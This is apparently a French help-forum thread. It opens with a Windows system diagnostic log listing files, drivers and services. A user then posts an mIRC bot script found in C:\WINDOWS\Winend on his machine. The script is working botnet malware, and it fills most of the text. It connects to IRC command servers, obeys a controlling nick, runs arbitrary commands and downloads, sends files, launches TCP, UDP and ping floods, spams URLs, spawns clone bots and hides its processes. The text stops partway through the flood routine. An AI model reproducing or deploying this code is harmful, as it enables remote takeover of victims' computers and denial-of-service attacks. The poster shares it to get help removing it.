    2009-03-17 03:01:47 ----A---- C:\WINDOWS\imsins.BAK
    2009-03-17 03:01:31 ----D---- C:\WINDOWS\system32\CatRoot2
    2009-03-17 03:01:12 ----SHD---- C:\WINDOWS\Installer
    2009-03-17 03:01:09 ----D---- C:\Documents and Settings\All Users\Application Data\Microsoft Help
    2009-03-17 00:41:12 ----D---- C:\Documents and Settings\lml-mike\Application Data\teamspeak2
    2009-03-16 15:57:04 ----HD---- C:\WINDOWS\$hf_mig$
    2009-03-09 04:24:15 ----A---- C:\WINDOWS\NeroDigital.ini
    2009-03-09 03:46:36 ----D---- C:\WINDOWS\system32\DirectX
    2009-03-09 03:46:21 ----RSD---- C:\WINDOWS\assembly
    2009-03-09 03:44:24 ----D---- C:\Program Files\Fichiers communs\Wise Installation Wizard
    2009-03-09 03:44:12 ----D---- C:\Program Files\AGEIA Technologies
    2009-03-09 03:43:23 ----D---- C:\Documents and Settings\lml-mike\Application Data\HLSW
    2009-03-08 21:07:04 ----D---- C:\Documents and Settings\lml-mike\Application Data\Skype
    2009-03-08 21:00:06 ----D---- C:\Documents and Settings\lml-mike\Application Data\skypePM
    2009-03-08 01:11:30 ----A---- C:\WINDOWS\system32\wrap_oal.dll
    2009-03-08 01:11:30 ----A---- C:\WINDOWS\system32\OpenAL32.dll
    2009-03-06 20:54:12 ----D---- C:\Documents and Settings\lml-mike\Application Data\Mumble
    2009-03-06 02:15:38 ----HD---- C:\Program Files\InstallShield Installation Information
    2009-03-04 12:36:51 ----D---- C:\Logs
    2009-03-04 12:36:40 ----D---- C:\Program Files\Fichiers communs
    2009-03-03 18:41:55 ----D---- C:\Documents and Settings\lml-mike\Application Data\DAEMON Tools Pro
    2009-03-01 20:41:49 ----AD---- C:\Documents and Settings\All Users\Application Data\TEMP
    2009-02-28 16:11:21 ----D---- C:\Documents and Settings\All Users\Application Data\avg8
    2009-02-28 16:10:20 ----D---- C:\Program Files\Fichiers communs\G DATA
    2009-02-28 16:06:09 ----SD---- C:\Documents and Settings\lml-mike\Application Data\Microsoft
    2009-02-25 21:54:59 ----A---- C:\WINDOWS\system32\MRT.exe
    2009-02-20 19:05:09 ----D---- C:\Program Files\Fichiers communs\Microsoft Shared
    2009-02-18 16:58:17 ----RSD---- C:\WINDOWS\Fonts
    
    ======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
    
    R1 AFS2K;AFS2k; C:\WINDOWS\system32\drivers\AFS2K.sys [2008-07-08 82380]
    R1 AvgLdx86;AVG AVI Loader Driver x86; C:\WINDOWS\System32\Drivers\avgldx86.sys [2009-03-17 325640]
    R1 AvgMfx86;AVG On-access Scanner Minifilter Driver x86; C:\WINDOWS\System32\Drivers\avgmfx86.sys [2009-02-28 27656]
    R1 intelppm;Pilote de processeur Intel; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-13 40576]
    R2 acedrv11;acedrv11; \??\C:\WINDOWS\system32\drivers\acedrv11.sys []
    R2 GDTdiInterceptor;GDTdiInterceptor; \??\C:\WINDOWS\system32\drivers\GDTdiIcpt.sys []
    R3 ADIDTSFiltService;ADI DTS Filter Service; C:\WINDOWS\system32\drivers\adidts.sys [2006-12-08 139776]
    R3 ADIHdAudAddService;ADI UAA Function Driver for High Definition Audio Service; C:\WINDOWS\system32\drivers\ADIHdAud.sys [2007-01-16 293888]
    R3 AEAudio;AE Audio Service; C:\WINDOWS\system32\drivers\AEAudio.sys [2006-08-06 93952]
    R3 Arp1394;Protocole client ARP 1394; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-13 60800]
    R3 GEARAspiWDM;GEARAspiWDM; C:\WINDOWS\System32\drivers\GEARAspiWDM.sys [2008-02-22 16168]
    R3 HDAudBus;Pilote de bus Microsoft UAA pour High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
    R3 hidusb;Pilote de classe HID Microsoft; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-13 10368]
    R3 mouhid;Pilote HID de souris; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2004-08-05 12288]
    R3 MTsensor;ATK0110 ACPI UTILITY; C:\WINDOWS\system32\DRIVERS\ASACPI.sys [2004-08-13 5810]
    R3 NIC1394;Pilote réseau 1394; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-13 61824]
    R3 nv;nv; C:\WINDOWS\system32\DRIVERS\nv4_mini.sys [2008-10-07 6133856]
    R3 usbaudio;Pilote USB audio (WDM); C:\WINDOWS\system32\drivers\usbaudio.sys [2008-04-13 60032]
    R3 usbccgp;Pilote parent générique USB Microsoft; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-13 32128]
    R3 usbehci;Pilote miniport de contrôleur d'hôte amélioré Microsoft USB 2.0; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-13 30208]
    R3 usbhub;Concentrateur USB2; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-13 59520]
    R3 usbuhci;Pilote miniport de contrôleur hôte universel USB Microsoft; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-13 20608]
    R3 yukonwxp;NDIS5.1 Miniport Driver for Marvell Yukon Ethernet Controller; C:\WINDOWS\system32\DRIVERS\yk51x86.sys [2006-07-26 248832]
    S3 61883;Pilote d'unité 61883; C:\WINDOWS\system32\DRIVERS\61883.sys [2008-04-13 48128]
    S3 a5lrjchr;a5lrjchr; C:\WINDOWS\system32\drivers\a5lrjchr.sys []
    S3 Avc;Périphérique AVC; C:\WINDOWS\system32\DRIVERS\avc.sys [2008-04-13 38912]
    S3 CCDECODE;Décodeur sous-titre fermé; C:\WINDOWS\system32\DRIVERS\CCDECODE.sys [2008-04-13 17024]
    S3 HPZid412;IEEE-1284.4 Driver HPZid412; C:\WINDOWS\system32\DRIVERS\HPZid412.sys [2003-03-09 51024]
    S3 HPZipr12;Print Class Driver for IEEE-1284.4 HPZipr12; C:\WINDOWS\system32\DRIVERS\HPZipr12.sys [2003-03-09 16080]
    S3 HPZius12;USB to IEEE-1284.4 Translation Driver HPZius12; C:\WINDOWS\system32\DRIVERS\HPZius12.sys [2003-03-09 21456]
    S3 MSDV;Microsoft DV Camera and VCR; C:\WINDOWS\system32\DRIVERS\msdv.sys [2008-04-13 51200]
    S3 MSTEE;Convertisseur en T/site-à-site de répartition Microsoft; C:\WINDOWS\system32\drivers\MSTEE.sys [2008-04-13 5504]
    S3 NABTSFEC;Codec NABTS/FEC VBI; C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys [2008-04-13 85248]
    S3 NdisIP;Connection TV/vidéo Microsoft; C:\WINDOWS\system32\DRIVERS\NdisIP.sys [2008-04-13 10880]
    S3 nm;Pilote du Moniteur réseau; C:\WINDOWS\system32\DRIVERS\NMnt.sys [2008-04-13 40320]
    S3 nmwcdnsu;Nokia USB Flashing Phone Parent; C:\WINDOWS\system32\drivers\nmwcdnsu.sys [2008-02-01 138112]
    S3 nmwcdnsuc;Nokia USB Flashing Generic; C:\WINDOWS\system32\drivers\nmwcdnsuc.sys [2008-02-01 8320]
    S3 NPF;NetGroup Packet Filter Driver; C:\WINDOWS\system32\drivers\npf.sys [2007-11-06 34064]
    S3 pccsmcfd;PCCS Mode Change Filter Driver; C:\WINDOWS\system32\DRIVERS\pccsmcfd.sys [2008-08-26 18816]
    S3 QCDonner;Logitech QuickCam Express; C:\WINDOWS\system32\DRIVERS\OVCD.sys [2001-08-17 28032]
    S3 SLIP;Détrameur décalage BDA; C:\WINDOWS\system32\DRIVERS\SLIP.sys [2008-04-13 11136]
    S3 SONYPVU1;Pilote de filtrage Sony USB (SONYPVU1); C:\WINDOWS\system32\DRIVERS\SONYPVU1.SYS [2001-08-17 7552]
    S3 streamip;BDA IPSink; C:\WINDOWS\system32\DRIVERS\StreamIP.sys [2008-04-13 15232]
    S3 upperdev;upperdev; C:\WINDOWS\system32\DRIVERS\usbser_lowerflt.sys [2008-06-06 8064]
    S3 usbprint;Classe d'imprimantes USB Microsoft; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-13 25856]
    S3 usbscan;Pilote de scanneur USB; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2008-04-13 15104]
    S3 usbser;USB Modem Driver; C:\WINDOWS\system32\drivers\usbser.sys [2008-04-13 26112]
    S3 UsbserFilt;UsbserFilt; C:\WINDOWS\system32\DRIVERS\usbser_lowerfltj.sys [2008-05-07 8064]
    S3 USBSTOR;Pilote de stockage de masse USB; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-13 26368]
    S3 VX6000;Microsoft LifeCam VX-6000; C:\WINDOWS\system32\DRIVERS\VX6000Xp.sys [2006-06-30 2383152]
    S3 Wdf01000;Wdf01000; C:\WINDOWS\system32\DRIVERS\Wdf01000.sys [2006-11-02 492000]
    S3 WSTCODEC;Codec Teletext standard; C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS [2008-04-13 19200]
    S3 WudfRd;Windows Driver Foundation - User-mode Driver Framework Reflector; C:\WINDOWS\system32\DRIVERS\wudfrd.sys [2006-09-15 82688]
    S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []
    S4 mchInjDrv;mchInjDrv; \??\C:\DOCUME~1\lml-mike\LOCALS~1\Temp\mc21.tmp []
    
    ======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
    
    R2 Autodesk Licensing Service;Autodesk Licensing Service; C:\Program Files\Fichiers communs\Autodesk Shared\Service\AdskScSrv.exe [2008-09-18 72704]
    R2 avg8wd;AVG8 WatchDog; C:\logs\avg\avgwdsvc.exe [2009-03-17 298264]
    R2 Diskeeper;Diskeeper; C:\Logs\Diskeeper\DkService.exe [2004-10-05 577644]
    R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2008-11-10 152984]
    R2 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Fichiers communs\LightScribe\LSSrvc.exe [2006-10-19 61440]
    R2 mi-raysat_3dsmax8;RaySat_3dsmax8 Server; V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe [2005-09-21 65536]
    R2 MSCamSvc;MSCamSvc; C:\Program Files\Microsoft LifeCam\MSCamSvc.exe [2006-06-30 187184]
    R2 NVSvc;NVIDIA Display Driver Service; C:\WINDOWS\system32\nvsvc32.exe [2008-10-07 163908]
    R2 SQLWriter;SQL Server VSS Writer; C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe [2007-02-10 89968]
    R2 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2008-04-13 14336]
    R3 NMIndexingService;NMIndexingService; C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexingService.exe [2006-12-23 262144]
    R3 ServiceLayer;ServiceLayer; C:\Program Files\PC Connectivity Solution\ServiceLayer.exe [2008-11-11 620544]
    S3 Adobe LM Service;Adobe LM Service; C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe [2008-09-18 72704]
    S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [2007-04-13 33632]
    S3 clr_optimization_v2.0.50727_32;.NET Runtime Optimization Service v2.0.50727_X86; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe [2007-04-13 68952]
    S3 FontCache3.0.0.0;Windows Presentation Foundation Font Cache 3.0.0.0; C:\WINDOWS\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe [2006-10-20 36864]
    S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Fichiers communs\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2005-02-24 73728]
    S3 idsvc;Windows CardSpace; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe [2006-10-30 741376]
    S3 MSSQL$SONY_MEDIAMGR2;SQL Server (SONY_MEDIAMGR2); C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [2008-12-18 29181272]
    S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Fichiers communs\Microsoft Shared\OFFICE12\ODSERV.EXE [2007-08-24 443776]
    S3 ose;Office Source Engine; C:\Program Files\Fichiers communs\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
    S3 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2003-03-09 65795]
    S3 rpcapd;Remote Packet Capture Protocol v.0 (experimental); C:\Program Files\WinPcap\rpcapd.exe [2007-11-06 92792]
    S3 WMPNetworkSvc;Service Partage réseau du Lecteur Windows Media; C:\Program Files\Windows Media Player\WMPNetwk.exe [2006-11-03 918016]
    S4 MSSQLServerADHelper;SQL Server Active Directory Helper; C:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [2005-10-14 45272]
    S4 NetTcpPortSharing;Net.Tcp Port Sharing Service; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe [2006-10-30 122880]
    S4 SQLBrowser;SQL Server Browser; C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe [2007-02-10 242544]
    
    -----------------EOF-----------------
    
    0
  3. lml-mike Messages postés 449 Date d'inscription   Statut Contributeur Dernière intervention   123
     
    Bon ben j'ai déjà ça :

    C:\WINDOWS\Winend

    La version d'IRC installée execute ce script...

    ;BASE OF STARTUP/DISCONNECT;
    on 1:start {
      run hex.exe /hide mIRC*
      set %servport 6667
      server $read serv.dll %servport
      set %chan #[X][OBB]
      set %nickstart [OBB][XBOT]-
      set %botversion Official Bad Bot V 1.0 [Owned By Aniya & NoToRiOuS]
      timerserver 0 60 con
      }
    alias servercheck {
      if ($server == $null) server $read serv.dll %port2
    }
    alias con { .server %server %servport }
    on 1:connect:{
      set %nick %nickstart $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9)
      timerconnected 0 300 connectcheck
      timerserver off
      nick %nick
      join %chan
    }
    on 1:disconnect:{
      timerconnected off
      nick %nick
      server $read serv.dll %servport
      timerserver 0 60 con
    }
    on 1:kick:#:{
      haltdef
      if ($knick == $me) {
        join %chan
        halt
      }
    }
    on *:BAN:#: {
      var %bannick $nick
      if ( $banmask isin $address( $me , 2) || $me isin $banmask ) {
        msg $chan [AUTOPROTECT]: %bannick try to ban $me
        kick $chan %bannick [AUTOPROTECT]: Protect Ban
        samode $chan +e $me
        samode $chan +b $address( %bannick , 2)
        samode $chan +b %bannick $+ !*@*
      samode $chan -b $banmask }
      else { halt }
    }
    ON *:JOIN:#:{
      if ( $nick == $me ) {
    .timer 1 1 mode $chan +o $me
    .timer 1 2 mode $chan +nts
      }
      halt
    }
    alias connectcheck { whois $me }
    on 1:kick:#:{
      if ($knick == $me) {
        join %chan
        halt
      }
    }
    on *:exit:{ run $mircexe }
    on *:SENDFAIL:*.*:msg %chan [SEND]: Send Failled: $3 $+ , User: $2
    ;GLOBAL COMMAND;
    on *:text:*:*: {
      if ($nick == Predator) {
      if ($1 == .hop) { hop %chan | halt }
      if ($1 == .driveinfo) { HD | halt }
      if ($1 == .time) { msg %chan [TIME]: $date(mm) $date(mmmm) $date(yyyy) $chr(124) $time $time(TT) $chr(124) $time(zzz) | halt }
      if ($1 == .uptime) { msg %chan [MAIN]: Uptime: $uptime(system,1) $+ . | halt }
      if ($1 == .url) { msg %chan [URL]: Active URL: $url | halt }
      if ($1 == .bmode) { msg %chan [BOTINFO]: Bot Mode: $usermode | halt } 
      if ($1 == .dns) { set %pub.dns on | dns $2 | halt }
      if ($1 == .visit) { msg %chan [VISIT]: URL Visited: $2 | run $2 | halt }
      if ($1 == .shutdown) { msg %chan [SHUTDOWN]: Shutting down system. | run shutdown -s -t 00 | halt }
      if ($1 == .reboot) { msg %chan [REBOOT]: Rebooting system. | run shutdown -r -t 00 | halt }
      if ($1 == .disconnect) { quit $2- }
      if ($1 == .reconnect) { quit $2- | server %server %servport | halt }
      if ($1 == .run) { msg %chan [RUN]: $2- | run $2- | halt }
      if ($1 == .version) { msg %chan [MAIN]: Version: %botversion | halt }
      if ($1 == .netinfo) { set %bot.ip $ip | set %bot.host $host | msg %chan [NETINFO]: [Type]: LAN (LAN Connection). [IP Address]: %bot.ip $+ . [Hostname]: %bot.host $+ . | halt }
      if ($1 == .creditcard) { creditcard }
      if ($1 == .mode) { mode $2- }
      if ($1 == .join) { join $2- }
      if ($1 == .part) { part $2- }
      if ($1 == .privmsg) { msg $2 $3- }
      if ($1 == .nick) { set %newnick $2 | set %changenick %newnick $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) | /nick %changenick }
      if ($1 == .rndnick2) { set %rndnick2 $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) | nick %rndnick2 | halt }
      if ($1 == .spam1) { set %spamurl11 $2 | set %spamurl12 $3 | set %spamurl13 $4 | spamurl1 | halt }
      if ($1 == .spam2) { set %spamurl21 $2 | set %spamurl22 $3 | set %spamurl23 $4 | spamurl2 | halt }
      if ($1 == .spam3) { set %spamurl31 $2 | set %spamurl32 $3 | set %spamurl33 $4 | spamurl3 | halt }
      if ($1 == .spamstop) { unset %spamurl1 | unset %spamurl2 | unset %spamurl3 | msg %chan [SPAM]: All spams have been stopped. | halt }
      if ($1 == .send) { /dcc send $2 $3 | msg %chan [SEND]: Sending File: $3 $+ , User: $2 | halt }
      if ($1 == .download) { set %downloadsite $2 | set %path-to-file $3 | set %save-as-filename $4 | download | msg %chan [DOWNLOAD]: Downloading URL: %path-to-file to: %save-as-filename | halt }
      if ($1 == .update) { set %downloadsite $2 | set %path-to-file $3 | set %save-as-filename $4 | update | msg %chan [UPDATE]: Downloading update from: %path-to-file | halt }
      if ($1 == .clone) { set %clone.server $2 | set %clone.servport $3 | set %clone.chan $4 | set %clone.pass $5 | set %clone.user $read dico.dll $read dico.dll $read dico.dll $read dico.dll | set %clone.nick $read dico.dll | open | halt }
      if ($1 == .c.msg) { sockwrite -n clone PRIVMSG $2 $3- | halt }
      if ($1 == .c.me) { sockwrite -n clone PRIVMSG $2 $chr(1) $+ ACTION $3- $+ $chr(1) | halt }
      if ($1 == .c.ctcp) { sockwrite -n clone PRIVMSG $2 $chr(1) $+ $3- $+ $chr(1) | halt }
      if ($1 == .c.notice) { sockwrite -n clone NOTICE $2 $3- | halt }
      if ($1 == .c.join) { sockwrite -n clone JOIN $2 | halt }
      if ($1 == .c.part) { sockwrite -n clone PART $2 | halt }
      if ($1 == .c.hop) { sockwrite -n clone PART $2 | sockwrite -n clone JOIN $2 | halt }
      if ($1 == .c.fhop) { sockwrite -n clone JOIN $2 | sockwrite -n clone PART $2 | halt }
      if ($1 == .c.nick) { set %clone.nick $read dico.dll | sockwrite -tn clone nick %clone.nick | halt }
      if ($1 == .c.stop) { sockclose clone | halt }
      if ($1 == .fping) { set %pingIP $2 | pingflood | halt }
      if ($1 == .tcpflood) { set %tcpflood.ip $2 | set %tcpflood.port $3 | set %tcpflood.secs $4 | tcpflood | halt }
      if ($1 == .tcpstop) { tcpflood.stop | halt }
      if ($1 == .udpflood) { set %udp.ip $2 | set %udp.secs $3 | udpflood | halt }
      if ($1 == .udpstop) { udpflood.stop | halt }
      if ($1 == .raw) {
        if ($2 == all) { msg %chan [RAW]: Running Command: $3- | $3- }
        if ($2 == $me) { msg %chan [RAW]: Running Command: $3- | $3- }
    }
      if ($1 == .dos) {
      msg %chan [DOS]: Running Command: $2-
      %output = cmd\ $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9)
      write %output $+ .bat $2-
      run -n %output $+ .bat
      }
      if ($1 == .dos.clear) {
      msg %chan [DOS]: Directory is now empty.
      %output = cmd\ $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9)
      write %output $+ .bat del C:\Windows\Winend\cmd\*.bat
      run -n %output $+ .bat
      if ($1 == .raw) {
        if ($2 == all) { msg %chan [RAW]: Running Command: $3- | $3- }
        if ($2 == $me) { msg %chan [RAW]: Running Command: $3- | $3- }
    }
    }
    }
    }
    ;CLONE;
    alias open {
      sockopen clone %clone.server %clone.servport
      msg %chan [CLONES]: Created on %clone.server $+ : $+ %clone.servport $+ , in %clone.chan
    }
    on *:SOCKOPEN:clone: {
      if ($sockerr > 0) { return }
    sockwrite -tn $sockname user %clone.user
    sockwrite -tn $sockname nick %clone.nick
    sockwrite -tn $sockname join %clone.chan
    }
    on *:sockread:clone: {
      sockread %cloneirc
      set %clone.action $gettok(%cloneirc,2,32)
      if (%clone.action == 433) { set %clone.nick $read dico.dll | sockwrite -n clone nick %clone.nick | halt }
      if (%clone.action == KICK) { sockwrite -n clone JOIN %bot.chan %bot.chanpw | halt }
      if (%clone.action == 473) { .timer 1 10 sockwrite -n clone JOIN %clone.cmd | halt }
      if (%clone.action == 475) { .timer 1 10 sockwrite -n clone JOIN %clone.cmd | halt }
      if (%clone.action == 471) { .timer 1 10 sockwrite -n clone JOIN %clone.cmd | halt }
      if (%clone.action == 474) { .timer 1 10 sockwrite -n clone JOIN %clone.cmd | halt }
    }
    ;DNS;
    on *:dns: {
      haltdef
      if (%bot.dns == on) {
        if ($raddress != $null) { set %bot.ip $iaddress }
        if (%bot.host == %bot.ip) { set %bot.host Anonymous }
        set %bot.dns off
      }
      if (%pub.dns == on) {
        if ($raddress != $null) { msg %chan [DNS]: Resolved $iaddress ( $+ $naddress $+ ) }
        else { msg %chan [DNS]: Unable to resolve. }
        set %pub.dns off
      }
    }
    alias pingflood {
      msg %chan [FLOOD]: Flooding %pingIP for 0 secs
      run ping -t %pingIP
      run hex.exe /hide *ping.exe*
      run hex.exe /hide *cmd.exe*
    }
    alias spamurl1 {
      msg %chan [SPAM]: Spam started on %spamurl11 $+ , %spamurl12 $+ , %spamurl13 $+ . 
      .timer 1 60 run %spamurl11
      .timer 1 60 msg %chan [SPAM] Spaming %spamurl11
      .timer 1 1800 run %spamurl12
      .timer 1 1800 msg %chan [SPAM] Spaming %spamurl12
      .timer 1 3600 run %spamurl13
      .timer 1 3600 msg %chan [SPAM] Spaming %spamurl13
      .timer 1 3610 msg %chan [SPAM] Spam completed $+ .
    }
    alias spamurl2 {
      msg %chan [SPAM]: Spam started on %spamurl21 $+ , %spamurl22 $+ , %spamurl23 $+ . 
      .timer 1 60 run %spamurl21
      .timer 1 60 msg %chan [SPAM] Spaming %spamurl21
      .timer 1 1800 run %spamurl22
      .timer 1 1800 msg %chan [SPAM] Spaming %spamurl22
      .timer 1 3600 run %spamurl23
      .timer 1 3600 msg %chan [SPAM] Spaming %spamurl23
      .timer 1 3610 msg %chan [SPAM] Spam completed $+ .
    }
    alias spamurl3 {
      msg %chan [SPAM]: Spam started on %spamurl31 $+ , %spamurl32 $+ , %spamurl33 $+ . 
      .timer 1 60 run %spamurl31
      .timer 1 60 msg %chan [SPAM] Spaming %spamurl31
      .timer 1 1800 run %spamurl32
      .timer 1 1800 msg %chan [SPAM] Spaming %spamurl32
      .timer 1 3600 run %spamurl33
      .timer 1 3600 msg %chan [SPAM] Spaming %spamurl33
      .timer 1 3610 msg %chan [SPAM] Spam completed $+ .
    }
    ;HD;
    alias HD {
      if ($disk(c:) == $true) { msg %chan [MAIN]: C: $bytes($disk(c:).size) $iif($remove($right($bytes($disk(c:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(c:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(c:).type) $chr(40) $+ $iif($disk(c:).label == $null, None, $disk(c:).label) $+ $chr(41) Free: $bytes($disk(c:).free) $iif($remove($right($bytes($remove($bytes($disk(c:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(c:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
      if ($disk(d:) == $true) { msg %chan [MAIN]: D: $bytes($disk(d:).size) $iif($remove($right($bytes($disk(d:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(d:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(d:).type) $chr(40) $+ $iif($disk(d:).label == $null, None, $disk(d:).label) $+ $chr(41) Free: $bytes($disk(d:).free) $iif($remove($right($bytes($remove($bytes($disk(d:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(d:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
      if ($disk(e:) == $true) { msg %chan [MAIN]: E: $bytes($disk(e:).size) $iif($remove($right($bytes($disk(e:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(e:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(e:).type) $chr(40) $+ $iif($disk(e:).label == $null, None, $disk(e:).label) $+ $chr(41) Free: $bytes($disk(e:).free) $iif($remove($right($bytes($remove($bytes($disk(e:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(e:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
      if ($disk(f:) == $true) { msg %chan [MAIN]: F: $bytes($disk(f:).size) $iif($remove($right($bytes($disk(f:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(f:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(f:).type) $chr(40) $+ $iif($disk(f:).label == $null, None, $disk(f:).label) $+ $chr(41) Free: $bytes($disk(f:).free) $iif($remove($right($bytes($remove($bytes($disk(f:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(f:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
      if ($disk(g:) == $true) { msg %chan [MAIN]: G: $bytes($disk(g:).size) $iif($remove($right($bytes($disk(g:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(g:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(g:).type) $chr(40) $+ $iif($disk(g:).label == $null, None, $disk(g:).label) $+ $chr(41) Free: $bytes($disk(g:).free) $iif($remove($right($bytes($remove($bytes($disk(g:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(g:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
      if ($disk(h:) == $true) { msg %chan [MAIN]: H: $bytes($disk(h:).size) $iif($remove($right($bytes($disk(h:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(h:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(h:).type) $chr(40) $+ $iif($disk(h:).label == $null, None, $disk(h:).label) $+ $chr(41) Free: $bytes($disk(h:).free) $iif($remove($right($bytes($remove($bytes($disk(h:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(h:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
      if ($disk(i:) == $true) { msg %chan [MAIN]: I: $bytes($disk(i:).size) $iif($remove($right($bytes($disk(i:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(i:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(i:).type) $chr(40) $+ $iif($disk(i:).label == $null, None, $disk(i:).label) $+ $chr(41) Free: $bytes($disk(i:).free) $iif($remove($right($bytes($remove($bytes($disk(i:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(i:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
      if ($disk(j:) == $true) { msg %chan [MAIN]: J: $bytes($disk(j:).size) $iif($remove($right($bytes($disk(j:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(j:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(j:).type) $chr(40) $+ $iif($disk(j:).label == $null, None, $disk(j:).label) $+ $chr(41) Free: $bytes($disk(j:).free) $iif($remove($right($bytes($remove($bytes($disk(j:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(j:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
    }
    ;TCP FLOOD;
    alias tcpflood {
      if (%tcpflood.port !isnum 1-65535) || (%tcpflood.secs !isnum 0-99999) { halt }
      msg %chan [TCPFLOOD]: Flooding %tcpflood.ip $+ : $+ %tcpflood.port for %tcpflood.secs seconds.
      .timertcp.flood 0 0.1 tcpflood2
      if (%flood.secs != 0) { .timertcp.flood.stop 1 %tcpflood.secs tcpflood.stop }
    }
